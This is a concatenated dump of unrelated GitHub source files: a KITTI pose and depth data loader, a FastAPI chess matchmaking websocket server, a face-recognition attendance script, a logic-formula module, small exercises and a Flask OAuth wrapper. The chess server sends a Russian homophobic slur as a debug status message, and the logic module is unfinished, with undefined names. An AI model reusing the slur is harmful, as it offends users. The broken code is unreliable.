这里不确定是否要和矫正矩阵做乘积\n # imu2cam = cam0_cam2_rec_mat @ cam_2rect_mat @ velo2cam_mat @ imu2velo_mat\n\n # 即缓存好当前日期的内参值(imu to cam2)就不用一直计算了\n self.imu2velo_calib_cache[image_file] = imu2cam\n return imu2cam\n\n @staticmethod\n def _get_oxts_file(image_file):\n \"\"\"Gets the oxts file from an image file.\"\"\"\n # find oxts pose file\n for cam in ['left', 'right']:\n # Check for both cameras, if found replace and return file name\n if IMAGE_FOLDER[cam] in image_file:\n return image_file.replace(IMAGE_FOLDER[cam], OXTS_POSE_DATA).replace('.png', '.txt')\n # Something went wrong (invalid image file)\n raise ValueError('Invalid KITTI path for pose supervision.')\n\n def _get_oxts_data(self, image_file):\n \"\"\"Gets the oxts data from an image file.\"\"\"\n oxts_file = self._get_oxts_file(image_file)\n if oxts_file in self.oxts_cache:\n oxts_data = self.oxts_cache[oxts_file]\n else:\n oxts_data = np.loadtxt(oxts_file, delimiter=' ', skiprows=0)\n self.oxts_cache[oxts_file] = oxts_data\n return oxts_data\n\n def _get_pose(self, image_file):\n \"\"\"Gets the pose information from an image file.\"\"\"\n if image_file in self.pose_cache:\n return self.pose_cache[image_file]\n\n # Find origin frame in this sequence to determine scale & origin translation\n base, ext = os.path.splitext(os.path.basename(image_file))\n origin_frame = os.path.join(os.path.dirname(image_file), str(0).zfill(len(base)) + ext) # 每个时间序列的0000000000.png\n\n # Get origin data\n origin_oxts_data = self._get_oxts_data(origin_frame)\n lat = origin_oxts_data[0]\n scale = np.cos(lat * np.pi / 180.)\n # Get origin pose\n origin_R, origin_t = pose_from_oxts_packet(origin_oxts_data, scale)\n\n origin_pose = transform_from_rot_trans(origin_R, origin_t)\n # origin_pose1 = transform_from_angle_trans(origin_t, origin_angle)\n # 这里的用处不大在于转换矩阵全是3X3的,无法和1X6的姿态做乘积,所以还是要在得到转换坐标系后的旋转矩阵后调用算法重新计算偏移角度(不知道会增加多大的计算复杂度)\n # Compute current pose\n oxts_data = self._get_oxts_data(image_file)\n R, t = pose_from_oxts_packet(oxts_data, scale)\n\n pose_imu = transform_from_rot_trans(R, t) # 4x4的转换矩阵,如果需要欧拉角的数据形式的话要对上一步进行修改\n # pose1 = transform_from_angle_trans(t, angle)\n # Compute odometry pose\n imu2cam = self._get_imu2cam_transform(image_file)\n # @是矩阵乘法运算符\n '''odo_pose = (imu2cam @ np.linalg.inv(origin_pose) @\n pose_imu @ np.linalg.inv(imu2cam)).astype(np.float32) # 4*4 @ (4*4)逆 @ (4*4) @ (4*4)逆=4*4 即旋转矩阵不包含位置信息'''\n\n # 摘自https://github.com/utiasSTARS/pykitti/blob/master/pykitti/utils.py和https://stackoverflow.com/questions/66672284/compute-pose-transformation-matrix-rotation-and-translation-from-gps-locatio\n pose_rot = transform_from_rot_trans(R, t - origin_t) # 这里的pose都是针对第一帧的变化!!!!!\n pose = R_to_angle(pose_rot)\n pose = torch.from_numpy(pose)\n pose = pose.to(torch.float32)# 得到的是六自由度姿态:x、y、z方向平移距离和角度偏移值\n \"\"\"odo_pose1 = (imu2cam @ np.linalg.inv(origin_pose1) @\n #pose1 @ np.linalg.inv(imu2cam)).astype(np.float32) # 3*4 @ (3*2)逆 @ (3*2) @ (3*4)逆\"\"\"\n\n # Cache and return pose\n # 这里把针对每个图片计算出来的pose也加入缓存中,不需要重复计算\n self.pose_cache[image_file] = pose\n return pose\n\n ########################################################################################################################\n\n def __len__(self):\n \"\"\"Dataset length.\"\"\"\n return len(self.paths)\n\n def __getitem__(self, idx):\n \"\"\"Get dataset sample given an index.\"\"\"\n # Add image information\n\n sample = {\n # 'idx': idx,\n #'filename': self.paths[idx], # eigen_zhou_files_idx左边补0至十位\n 'idx': extract_idx(self.paths[idx]), # 包含了日期时间段和index\n 'rgb': load_image(self.paths[idx]),\n }\n \"\"\" # Add intrinsics\n parent_folder = self._get_parent_folder(self.paths[idx])\n if parent_folder in self.calibration_cache:\n c_data = self.calibration_cache[parent_folder]\n else:\n c_data = self._read_raw_calib_file(parent_folder)\n self.calibration_cache[parent_folder] = c_data\n sample.update({\n # 为什么sample字典中要返回内参:图像缩放参数\n 'intrinsics': self._get_intrinsics(self.paths[idx], c_data),\n })\"\"\"\n\n # Add pose information if requested\n if self.with_pose:\n sample.update({\n 'pose': self._get_pose(self.paths[idx]),\n })\n\n # Add depth information if requested\n if self.with_depth:\n sample.update({\n 'depth': self._read_depth(self._get_depth_file(self.paths[idx])),\n })\n\n # 怎么把前后缀分开计算\n # Add context information if requested\n if self.with_context:\n # Add context images and depth\n all_context_idxs = self.backward_context_paths[idx] + \\\n self.forward_context_paths[idx] # 两个id重复的话输出的是什么\n image_context_paths, depth_context_paths = \\\n self._get_context_files(self.paths[idx], all_context_idxs)\n if self.with_dynamic:\n if idx > 0:\n backward_context_idxs = idx - 1\n else: # 动态池第一帧\n backward_context_idxs = idx + 1\n if idx < len(self.paths) - 1:\n forward_context_idxs = idx + 1\n else: # 动态池最后一帧\n forward_context_idxs = idx - 1\n depth_context_paths.append(self._get_depth_file(self.paths[backward_context_idxs]))\n depth_context_paths.append(self._get_depth_file(self.paths[forward_context_idxs]))\n\n '''image_last_paths, depth_last_paths = \\\n self._get_context_files(self.paths[idx], self.backward_context_paths[idx])\n image_next_paths, depth_next_paths = \\\n self._get_context_files(self.paths[idx], self.forward_context_paths[idx])'''\n image_context = [load_image(f) for f in image_context_paths]\n image_last = image_context[0]\n image_next = image_context[-1] # 改成1的时候会报错:list index out of range\n sample.update({\n 'rgb_last': image_last,\n 'rgb_next': image_next\n })\n '''for f in image_last_paths:\n # global image_last\n image_last = load_image(f)\n sample.update({\n 'rgb_last': image_last\n })\n print(f)\n # global image_last_pose\n image_last_pose = self._get_pose(f)\n if self.with_pose:\n sample.update({\n 'pose_last': image_last_pose\n })\n\n for f in image_next_paths:\n # global image_next\n image_next = load_image(f)\n sample.update({\n 'rgb_next': image_next\n })\n # global image_next_pose\n image_next_pose = self._get_pose(f)\n if self.with_pose:\n sample.update({\n 'pose_next': image_next_pose\n })'''\n # image_last = load_image(set(image_last_paths)) # 返回的是列表型数据,len(image_last_paths)=1\n\n depth_context = [self._read_depth(f) for f in depth_context_paths] # depth_context需要筛除掉不存在的帧\n depth_last = depth_context[0]\n #print(depth_context_paths[0]) 这里读出帧的顺序又全部错乱了,应该是上面有一部是随机读取的\n depth_next = depth_context[-1]\n #print(depth_context_paths[-1])\n sample.update({\n 'depth_last': depth_last,\n 'depth_next': depth_next\n })\n '''for f in depth_last_paths:\n # global depth_last\n depth_last = self._read_depth(f)\n if self.with_depth:\n sample.update({\n 'depth_last': depth_last\n })\n for f in depth_last_paths:\n # global depth_next\n depth_next = self._read_depth(f)\n if self.with_depth:\n sample.update({\n 'depth_next': depth_next\n })'''\n\n '''if self.with_depth:\n \n sample.update({\n 'depth_last': depth_last,\n 'depth_next': depth_next\n })'''\n\n # Add context poses\n if self.with_pose: # 一般默认是True\n first_pose = sample['pose']\n image_context_pose = [self._get_pose(f) for f in image_context_paths]\n pose_last = image_context_pose[0]\n pose_next = image_context_pose[-1]\n sample.update({\n 'pose_last': pose_last,\n 'pose_next': pose_next\n })\n\n # image_last_pose = self._get_pose(set(image_last_paths))\n # image_next_pose = self._get_pose(set(image_next_paths))\n \"\"\"image_context_pose = [invert_pose_numpy(context_pose) @ first_pose\n for context_pose in image_context_pose] # 这里又出现问题了\"\"\"\n '''sample.update({\n 'pose_last': image_last_pose,\n 'pose_next': image_next_pose\n })'''\n # Apply transformations\n if self.data_transform:\n sample = self.data_transform(sample)\n\n \"\"\"sample_new = deepcopy(sample)\n sample = None\n self.paths[idx] = None\n self.backward_context_paths[idx] = None\n self.forward_context_paths[idx] = None\"\"\"\n # Return sample\n #return sample['idx'], sample['rgb'], sample['depth'], sample['pose'], sample['rgb_last'], sample['rgb_next'], sample['depth_last'], sample['depth_next'], sample['pose_last'], sample['pose_next']\n return sample\n\n\nclass data_prefetcher():\n def __init__(self, loader):\n self.loader = iter(loader)\n self.stream = torch.cuda.Stream()\n #self.data_ransformer dataloader中已经预处理了,这一步还需要预处理吗?\n # With Amp, it isn't necessary to manually convert data to half.\n # if args.fp16:\n # self.mean = self.mean.half()\n # self.std = self.std.half()\n self.preload()\n\n def preload(self):\n try:\n self.sample = next(self.loader)\n except StopIteration:\n self.sample = None\n return\n with torch.cuda.stream(self.stream):\n #self.sample = self.sample.cuda(non_blocking=True)\n self.sample = {key: self.sample[key].to(device, non_blocking=True) for key in self.sample}\n\n # With Amp, it isn't necessary to manually convert data to half.\n # if args.fp16:\n # self.next_input = self.next_input.half()\n # else:\n\n def next(self):\n torch.cuda.current_stream().wait_stream(self.stream)\n sample = self.sample\n self.preload()\n return sample\n\n\n########################################################################################################################\nif __name__ == \"__main__\":\n kitti_dataset = KITTIDataset(file_list='/home/zhanl/data/kitti/data_splits/train.txt',\n dynamic_list=None,\n data_transform=to_tensor_transforms,\n forward_context=1,\n backward_context=1,\n depth_type='groundtruth',\n with_pose=True) # resize的时候改成等比例缩放\n\n print(len(kitti_dataset))\n","repo_name":"Zhuweilong123/motion_segment","sub_path":"dataset/original_method/kitti_dataset.py","file_name":"kitti_dataset.py","file_ext":"py","file_size_in_byte":31783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72021132649","text":"''' Exercise 6: \r\nRewrite the program that prompts the user for a list of numbers and prints out the maximum and minimum of the numbers at the end when \r\nthe user enters “done”. Write the program to store the numbers the user enters in a list and use the max() and min() functions to\r\ncompute the maximum and minimum numbers after the loop completes.\r\n'''\r\n\r\ntheList = list()\r\n\r\nwhile True:\r\n userInput = input(\"Enter a number: \")\r\n if userInput == 'done':\r\n break\r\n try:\r\n num = float(userInput)\r\n except:\r\n print(\"Please enter a number\")\r\n continue\r\n theList.append(num)\r\n\r\nprint(\"Maximum\", max(theList))\r\nprint(\"Minimum\", min(theList))\r\n","repo_name":"YoonHCho/python-for-everybody","sub_path":"Course2/8.6_exercise.py","file_name":"8.6_exercise.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31184835136","text":"from datetime import datetime\nfrom sqlalchemy.exc import SQLAlchemyError\nimport uvicorn\nfrom fastapi import FastAPI, Depends\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom starlette.websockets import WebSocket, WebSocketDisconnect\nfrom src.api.authentication.base_config import auth_backend, fastapi_users\nfrom src.api.authentication.router import router as router_user, get_info_by_user_id\nfrom src.api.authentication.schemas import UserRead, UserCreate\nfrom src.api.matches.router import router as router_matches\nfrom src.database import get_async_session\nfrom src.game_engine.chess_engine import Game\nfrom src.game_engine.connection_manager import ConnectionManager, ConnectionManagerNew\nfrom src.game_engine.player import Player\nfrom src.game_engine.router import router as router_game_engine\n\n\napp = FastAPI(\n title=\"Belchessmind.org\"\n)\n\n\norigins = [\"http://localhost\",\n \"http://localhost:3000\",\n \"http://localhost:8000\"]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n expose_headers=[\"*\"]\n)\n\napp.include_router(\n fastapi_users.get_auth_router(auth_backend),\n prefix=\"/auth/jwt\",\n tags=[\"Auth\"],\n)\n\napp.include_router(\n fastapi_users.get_register_router(UserRead, UserCreate),\n prefix=\"/auth\",\n tags=[\"Auth\"],\n)\n\napp.include_router(router_user)\napp.include_router(router_matches)\napp.include_router(router_game_engine)\n\n# manager = ConnectionManager()\nmanager = ConnectionManagerNew()\n\n\n{\"user_id\": 1, \"game_state\": \"qweqweqwe\"}\n\n\n@app.websocket('/wse/{user_id}')\nasync def add_to_queue_ws(websocket: WebSocket, user_id: int):\n await manager.connect(websocket, user_id)\n try:\n while True:\n data = await websocket.receive_json()\n await manager.broadcast(websocket, {\n \"user_id\": manager.active_connections[websocket],\n \"game_state\": data[\"game_state\"]\n })\n except WebSocketDisconnect:\n manager.disconnect(websocket)\n await manager.broadcast(f\"Client #{user_id} left the chat\")\n\n\n@app.websocket(\"/ws/{mode_id}/{user_id}\")\nasync def add_to_queue_ws(websocket: WebSocket, mode_id: int, user_id: int,\n session: AsyncSession = Depends(get_async_session)):\n player = None\n player1 = None\n player2 = None\n\n try:\n await manager.connect_user(websocket)\n while True:\n # request_json = await websocket.receive_json()\n qwe = await websocket.receive_text()\n print(qwe)\n if qwe == \"q\":\n if mode_id in range(1, 10):\n is_rate = True\n else:\n is_rate = False\n user_data = await get_info_by_user_id(user_id, session)\n\n await websocket.send_text(user_data[\"data\"][\"nickname\"])\n\n player = Player(websocket, user_data[\"data\"]['id'], user_data[\"data\"]['nickname'],\n user_data[\"data\"]['rate_blitz'], user_data[\"data\"]['rate_rapid'],\n user_data[\"data\"]['rate_rapid'], mode_id, is_rate)\n\n await manager.add_player_to_queue(player)\n player1, player2 = await manager.find_new_game(mode_id)\n\n if player1 is None and player2 is None:\n await websocket.send_text(\"не пидарасы\")\n\n if player1 is not None and player2 is not None:\n await player1.websocket.send_text(\"пидарасы\")\n await player2.websocket.send_text(\"пидарасы\")\n await manager.remove_player_from_queues(player1)\n await manager.remove_player_from_queues(player2)\n time_start = datetime.utcnow()\n game = Game(player1, player2, mode_id, time_start, player1.is_rated_mode)\n await manager.add_game_to_list(game)\n await game.player1.send_game_state(game.get_state())\n await game.player2.send_game_state(game.get_state())\n\n await player1.websocket.send_text(\"else1\")\n await player2.websocket.send_text(\"else2\")\n elif qwe == \"w\":\n print(\"|||||||||qwe == w\")\n print(player1)\n print(player2)\n resp1 = await player1.websocket.receive_json()\n resp2 = await player2.websocket.receive_json()\n print(resp1)\n print(resp2)\n await player1.websocket.send_text(\"else1_qwe\")\n await player2.websocket.send_text(\"else2_qwe\")\n # await player1.websocket.send_text(await game.get_id_player_to_move())\n # await player2.websocket.send_text(await game.get_id_player_to_move())\n while True:\n print(\"qweqweqwe\")\n request_json = None\n if game.get_id_player_to_move() == 1:\n request_json = await player1.get_json()\n elif game.get_id_player_to_move() == 2:\n request_json = await player2.get_json()\n else:\n print(\"error validation\")\n\n if request_json[\"operation\"] == \"make_a_move\":\n if request_json[\"number_player\"] == 1:\n game = manager.find_curr_game(player1)\n elif request_json[\"number_player\"] == 2:\n game = manager.find_curr_game(player2)\n game.make_a_move(request_json[\"data\"][0], request_json[\"data\"][1],\n request_json[\"data\"][2], request_json[\"data\"][3])\n if game.is_game_end():\n player_winner = game.get_winner()\n player_loser = game.get_loser()\n await player_winner.send_message(\"you_win\")\n await player_loser.send_message(\"you_lose\")\n break\n await game.player1.send_game_state(game.get_state())\n await game.player2.send_game_state(game.get_state())\n elif request_json['operation'] == \"surrender\" or request_json['operation'] == \"time_over\":\n if request_json[\"number_player\"] == 1:\n game = manager.find_curr_game(player1)\n elif request_json[\"number_player\"] == 2:\n game = manager.find_curr_game(player2)\n if request_json[\"number_player\"] == 1:\n await player1.send_message(\"you_lose\")\n await player2.send_message(\"you_win\")\n player_winner = player2\n player_loser = player1\n break\n elif request_json[\"number_player\"] == 2:\n await player1.send_message(\"you_win\")\n await player2.send_message(\"you_lose\")\n player_winner = player1\n player_loser = player2\n break\n await manager.set_game_end_to_list(game)\n time_end = datetime.utcnow()\n time_length = time_end - time_start\n game_length = time_length.seconds\n rate_change_winner, rate_change_loser = 0, 0\n if game.is_rated:\n rate_change_winner, rate_change_loser = manager.count_rate_change(player_winner, player_loser)\n await manager.update_users_rate_in_db(mode_id, player_winner, player_loser,\n rate_change_winner, rate_change_loser)\n await manager.add_match_to_db(mode_id, time_start, game_length,\n player_winner.nickname, player_loser.nickname,\n player_winner.player_id, player_loser.player_id,\n rate_change_winner, rate_change_loser)\n await manager.delete_game_from_list(game)\n await player1.send_message(\"disconnecting\")\n await player2.send_message(\"disconnecting\")\n await manager.disconnect_user(player1)\n await manager.disconnect_user(player2)\n else:\n await websocket.send_text(\"else\")\n await websocket.send_text(\"else1234\")\n except WebSocketDisconnect as e:\n await manager.disconnect_user(websocket)\n await manager.remove_player_from_queues(player)\n await manager.clear_ended_games()\n return {\n \"status\": \"error\",\n \"data\": \"WebSocketDisconnect\",\n \"details\": str(e)\n }\n except SQLAlchemyError as e:\n return {\n \"status\": \"error\",\n \"data\": \"SQLAlchemyError\",\n \"details\": f\"Database error: {str(e)}\"\n }\n except Exception as e:\n return {\n \"status\": \"error\",\n \"data\": \"Exception\",\n \"details\": str(e)\n }\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"src.main:app\", host=\"127.0.0.1\", port=8000, reload=True)\n\n","repo_name":"ilya1004/ProjectFiles","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72911369448","text":"import face_recognition\nimport cv2\nimport os\nimport pyttsx3\nimport numpy as n\nfrom datetime import datetime\npath='images'\ni=[]\nc=[]\nq=[]\nmy=os.listdir(path)\nprint(my)\nfor c1 in my:\n im=cv2.imread(f'{path}/{c1}')\n i.append(im)\n c.append(os.path.splitext(c1)[0])\ndef speak(text):\n e=pyttsx3.init()\n e.say(text)\n e.runAndWait()\nspeak(\"hi\")\ndef attendance(n2):\n with open('attendance','r+') as f:\n lis=f.readlines()\n newlist=[]\n for i in lis:\n entry=i.split(',')\n newlist.append(entry[0])\n if n2 not in newlist:\n print(newlist)\n speak(n2 + \"attendance has been recorded\")\n no=datetime.now()\n ds=no.strftime('%H:%M:%S')\n f.write(f'\\n{n2},{ds}')\n else:\n speak(\"Your attendance has already been recorded\")\ndef encode(i):\n encode1=[]\n for v in i:\n v= cv2.cvtColor(v, cv2.COLOR_BGR2RGB)\n h = face_recognition.face_encodings(v)[0]\n encode1.append(h)\n return encode1\nee=encode(i)\nprint(len(ee))\ncap=cv2.VideoCapture(0)\nwhile True:\n s,ii=cap.read()\n image=cv2.resize(ii,(0,0),None,0.25,0.25)\n image= cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n face=face_recognition.face_locations(image)\n encodeing=face_recognition.face_encodings(image,face)\n for ff,eee in zip(face,encodeing):\n m=face_recognition.compare_faces(eee,ee)\n faced=face_recognition.face_distance(eee,ee)\n print(faced)\n match=n.argmin(faced)\n print(match)\n if m:\n n2=c[match].upper()\n q.append(n2)\n attendance(n2)\n\n\n\n\n","repo_name":"jonsnow120/ML_Attendance_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17174599488","text":"from ddq.taxonomy.node import Node, NodeRepr\nfrom ddq.topics.topic import Topic\nfrom ddq.topics.logics.topic import Logic\nfrom ddq.topics.logics.logic import Definition, Formulator, Term\nfrom ddq.topics.logics.logic import Function as LogicalFunction \nfrom ddq.util.check_type import check_type\n\n\nclass InductiveFormationFormulator(Formulator):\n def __call__(self, *parameters) -> Node:\n return InductiveFormation(*parameters)\n \n \nclass InductiveFormation(LogicalFunction):\n def __init__(self, *in_children):\n super().__init__()\n self.set_children(in_children)\n \n def accepts_child(self, index: int, child: \"Node\") -> bool:\n return check_type(child, Term)\n \n @staticmethod\n def symbol() -> str:\n return \"{}\"\n \n def repr_node(self) -> NodeRepr:\n return self.symbol()\n\n\nclass InductionFormationDefinitionInductor(Definition):\n def __init__(self, FOL: Logic, ST: Topic):\n self._fol = FOL\n self._st = ST\n\n def create_definition_node(self, induction_length: int):\n def recurse_create_forall(count: int,\n vars: VarBuilder, \n index: int = 0) -> Node:\n if index == count:\n return None\n else:\n return FOL.Forall(\n vars.universal(\"u_{}\".format(index)),\n recurse_create_forall(count, vars, index+1))\n def recurse_create_or(count: int,\n check_var: str,\n vars: VarBuilder, \n index: int = 0) -> Node:\n eq_formula = FOL.Eq(vars[check_var], vars[\"u_{}\".format(index)])\n if index + 1 == count:\n return eq_formula \n else:\n return FOL.Or(\n eq_formula,\n recurse_create_or(count, check_var, vars, index+1))\n # TBC continue here, we are just about re-adding the FOL quantifier to FOL\n self._defined = (ST.InductiveFormation, [Term]*induction_length)\n vars = VarBuilder()\n root_member_foralls = recurse_create_forall(index, vars)\n tail_member_foralls = root_member_foralls\n while tail_member_foralls.right() is not None:\n tail_member_foralls = tail_member_foralls.right()\n members = vars.values()\n tail_member_foralls.set_right(\n FOL.Forall(\n vars.universal(\"Set\"),\n FOL.Equiv(\n FOL.Eq(\n vars[\"Set\"],\n ST.InductiveFormation(index, *members)\n ),\n FOL.Forall(\n vars.universal(\"x\"),\n FOL.Equiv(\n ST.In(vars[\"x\"], vars[\"Set\"]),\n recurse_create_or(index, \"x\", vars)\n )\n )\n )\n )\n )\n self._formula = root_member_foralls\n pass\n\n def __call__(self, *parameters) -> Node:\n return self.create_definition_node(*parameters)\n\n\n","repo_name":"jadnohra/connect","sub_path":"proto_3/ddq/topics/set_theory/inductive_formation.py","file_name":"inductive_formation.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43107471903","text":"# -*- coding: utf-8 -*-\n\"\"\"Console script for f90nmlparse.\"\"\"\nimport os\nimport sys\nimport click\nimport logging\n\nfrom f90nmlparse.f90nmlparse import nmlparse, nmlwrite\nfrom f90nmlparse.utils import count_to_log_level\n\n__version__ = '0.1.0'\n\n\n@click.command()\n@click.option(\n '--dry-run',\n '-n',\n flag_value='dry_run',\n default=False,\n help=\"Perform a trial run with no changes made\")\n@click.option(\n '--verbose',\n '-v',\n count=True,\n help=\"Increase verbosity (specify multiple times for more)\")\n@click.option('--version', '-V', is_flag=True, help=\"Print version\")\n@click.option('--format', '-f', help=\"Output format (json, nml or yaml)\")\n@click.option('--out_file', '-o', help=\"Output file\")\n@click.argument('infile', type=click.File('rb'), nargs=1)\ndef main(*args, **kwargs):\n \"\"\"Parse fortran namelist and print it in different formats to an output file or to stdout\"\"\"\n\n logging.basicConfig(level=count_to_log_level(kwargs['verbose']))\n\n logging.warning(\"This is a warning.\")\n logging.info(\"This is an info message.\")\n logging.debug(\"This is a debug message.\")\n\n if kwargs['version']:\n click.echo(__version__)\n return 0\n\n if kwargs['dry_run']:\n click.echo(\"Is dry run\")\n return 0\n\n if kwargs[\"out_file\"]:\n output_file = kwargs[\"out_file\"]\n else:\n output_file = sys.stdout\n\n # read input file name from command line\n infile = kwargs[\"infile\"].name\n\n mynml = nmlparse(infile)\n\n if kwargs[\"format\"]:\n output_fmt = kwargs[\"format\"]\n else:\n output_fmt = \"json\"\n\n nmlwrite(mynml, _out=output_file, format=output_fmt)\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main()) # pragma: no cover47\n","repo_name":"MeteoSwiss-APN/f90nmlparse.old","sub_path":"src/f90nmlparse/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35959889044","text":"#Standard Python Imports\n#\n\n#Added Python Libraries\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk\n\n#Internal Imports\nfrom Enums import WinState\nfrom winInitial import WinInitial\nfrom mainGameWindow import MainGameWindow\nfrom newCharSheet import NewCharSheet\n\nclass MainWindow(Gtk.Window):\n\t#notebook - the notebook to handle the \"tabs\"\n\t#page_field - the page which conteins the field of the game\n\t#page_sheets - the page which conteins the charactes sheet of the game\n\t#state - the current state of the window\n\t#gdk_screen - the Gdk.Screen which holds the screen's settings\n\t#max_width\n\t#max_height\n\trpg_system = None #the RPG system type being played (settled by winInitial after a game load)\n\n\tdef __init__(self):\n\t\tGtk.Window.__init__(self)\n\t\tself.set_border_width(10)\n\n\t\t#getting windows settings\n\t\tself.gdk_screen = Gdk.Screen.get_default()\n\t\tself.max_width = self.gdk_screen.get_width()\n\t\tself.max_height = self.gdk_screen.get_height()\n\n\t\tself.state = WinState(0).initial_state()\n\t\tself.buildWindow()\n\n\tdef buildWindow(self):\n\t\t##\n\t\t# Change the window according with the current state\n\t\t##\n\n\t\tif self.state == WinState.MAIN_PLAY:\n\t\t\t#clear windows if needed\n\t\t\tself.clear()\n\n\t\t\t#biuld the correct window\n\t\t\tMainGameWindow(self)\n\n\t\telif self.state == WinState.CHOOSE_GAME:\n\t\t\t#clear windows if needed\n\t\t\tself.clear()\n\n\t\t\t#biuld the correct window\n\t\t\tWinInitial(self)\n\t\telif self.state == WinState.NEW_CHAR:\n\t\t\t#clear windows if needed\n\t\t\tself.clear()\n\n\t\t\t#biuld the correct window\n\t\t\tNewCharSheet(self)\n\t\telse:\n\t\t\tpass\n\n\tdef clear(self):\n\t\t##\n\t\t# clear all the window's child, if there's any.\n\t\t##\n\n\t\tchildren = self.get_children()\n\t\tif children is not None:\n\t\t\tfor elem in children:\n\t\t\t\tif type(elem) == Gtk.Box:\n\t\t\t\t\tself.remove(elem)\n","repo_name":"davincif/RPGHelper","sub_path":"mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33824171614","text":"# JavaScript Algorithms and Data Structures Projects: Caesars Cipher\n#\n# One of the simplest and most widely known ciphers is a Caesar cipher, also known as a shift\n# cipher. In a shift cipher the meanings of the letters are shifted by some set amount. A common\n# modern use is the ROT13 cipher, where the values of the letters are shifted by 13 places.\n# Thus 'A' ↔ 'N', 'B' ↔ 'O' and so on. Write a function which takes a ROT13 encoded string as\n# input and returns a decoded string. All letters will be uppercase. Do not transform any\n# non-alphabetic character (i.e. spaces, punctuation), but do pass them on.\n#\n# rot13(str) ➞ str\n\n\ndef rot13(str):\n alphabet = \"\"\n for i in range(65, 91):\n alphabet += chr(i)\n ciphabet = alphabet[13 : len(alphabet)] + alphabet[0:13]\n return \"\".join([x if not x.isalpha() else ciphabet[alphabet.index(x)] for x in str])\n\n\nprint(rot13(\"LBH QVQ VG!\")) # ➞ \"YOU DID IT!\"\nprint(rot13(\"SERR PBQR PNZC\")) # ➞ \"FREE CODE CAMP\"\nprint(rot13(\"SERR CVMMN!\")) # ➞ \"FREE PIZZA!\"\nprint(rot13(\"SERR YBIR?\")) # ➞ \"FREE LOVE?\"\nprint(\n rot13(\"GUR DHVPX OEBJA SBK WHZCF BIRE GUR YNML QBT.\")\n) # ➞ \"THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG.\"\n\n# Notes\n#\n# A = 65\n# Z = 90\n# a = 97\n# z = 122\n","repo_name":"anthonyBosek/py-gorithms","sub_path":"projectAlgorithms/+Caesars Cipher/caesarsCipher.py","file_name":"caesarsCipher.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36351929707","text":"from love_letter.card import Card\n\n\nclass Baron(Card):\n\n input_instructions = \"Baron input instructions:\\n\" \\\n \"'card number-opponent number'\\n\" \\\n \"example: 1-2\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Baron\"\n self.score = 3\n self.description = \"Player will choose another player and privately compare hands.\" \\\n \" The player with the lower-strength hand is eliminated from the round.\"\n\n def execute_action(self, target):\n player_card = self.player.show_card()\n target_card = target.show_card()\n\n if player_card.score > target_card.score:\n target.is_active = False\n elif target_card.score > player_card.score:\n self.player.is_active = False","repo_name":"evbeda/games4","sub_path":"love_letter/cards/baron.py","file_name":"baron.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24696084275","text":"from flask import Flask\r\nfrom flask import render_template, make_response\r\nfrom flask_restful import Resource, Api, request\r\n\r\nfrom GoogleOAuth2Interface import GoogleOAuth2Interface\r\n\r\ngoogleOAuth2Interface = GoogleOAuth2Interface()\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\nclass Login(Resource):\r\n def get(self):\r\n chatid = request.args.get('chatid')\r\n apipsw = request.args.get('apipsw')\r\n return googleOAuth2Interface.login(chatid, apipsw)\r\n \r\n def post(self):\r\n chatid = request.get_json().get('chatid')\r\n apipsw = request.get_json().get('apipsw')\r\n return googleOAuth2Interface.login(chatid, apipsw)\r\n\r\nclass Oauth2Callback(Resource):\r\n def get(self):\r\n state = request.args.get('state')\r\n token = request.args.get('code')\r\n return googleOAuth2Interface.oauth2Callback(state, token)\r\n \r\n def post(self):\r\n request_json = request.get_json()\r\n state = request_json.get('state')\r\n token = request_json.get('code')\r\n return googleOAuth2Interface.oauth2Callback(state, token)\r\n\r\nclass GetCredentials(Resource):\r\n def get(self):\r\n chatid = request.args.get('chatid')\r\n apipsw = request.args.get('apipsw')\r\n return googleOAuth2Interface.getCredentials(chatid, apipsw)\r\n \r\n def post(self):\r\n chatid = request.get_json().get('chatid')\r\n apipsw = request.get_json().get('apipsw')\r\n return googleOAuth2Interface.getCredentials(chatid, apipsw)\r\n\r\napi.add_resource(Login, '/login')\r\napi.add_resource(Oauth2Callback, '/oauth2callback')\r\napi.add_resource(GetCredentials, '/getCredentials')\r\n\r\nif __name__ == '__main__':\r\n #app.run(debug=True, port=5001)\r\n app.run(debug=True, use_reloader=False, 